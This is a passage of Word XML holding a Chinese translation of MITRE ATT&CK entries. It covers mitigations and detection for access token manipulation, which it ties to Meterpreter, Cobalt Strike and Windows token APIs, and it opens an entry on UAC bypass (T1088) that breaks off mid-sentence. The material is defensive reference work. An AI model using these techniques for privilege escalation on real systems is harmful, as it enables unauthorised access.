    <w:p w14:paraId="478B422E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负载允许任意的令牌操控，并通过令牌模拟来提升权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Cobalt Strike beacon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负载允许任意令牌模拟，也可以创建令牌。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476B45B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B245BB" w14:paraId="6C3272FF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="18F1D224" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="101762B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="78F96A2A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66729825" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5543B8DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制权限，使得用户和用户组无法创建令牌。应仅为本地系统账号做此设置。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>计算机配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本地策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户权限分配：创建令牌对象。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2217753D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>还可以定义哪些人可以仅为本地和网络服务创建进程级令牌。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>PO</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径：计算机配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本地策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户权限分配：替换进程级令牌。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="36659E3B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136AD8A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05054646" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者必须已经在本地系统上具有管理员级别的访问权限才能充分利用此技术。请确保将用户和账号限制在其所需的最低权限范围内。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73741D1D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488DE004" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7C44F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>命令行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析人员可以审核命令行活动来检测令牌操纵情况。具体来说，分析人员应该检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的使用。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中，默认情况下不启用详细的命令行日志记录功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192CFC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果攻击者使用的是直接调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的有效负载，那么分析人员只能通过仔细分析用户网络活动、检查正在运行的进程以及分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他端点和网络行为的相关性来检测令牌操纵情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A17A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效负载可以利用多种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用来操纵访问令牌，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>LogonUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DuplicateTokenEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ImpersonateLoggedOnUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。详细信息，请参阅参考的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A94B83" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询系统中的进程和线程令牌信息，并查找不一致情况，例如用户拥有模拟本地系统账号的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2BA22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="46610AD6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6B6026" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1088</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B547BAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸，权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73198EEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="368D6707" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B6494A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11267C3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统调用，进程监控，认证日志，进程命令行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7920A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用户账号控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE58C9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5051DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13E98A23" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="016524C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（用户账号控制）允许程序通过提示用户进行确认来提升权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以便其</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
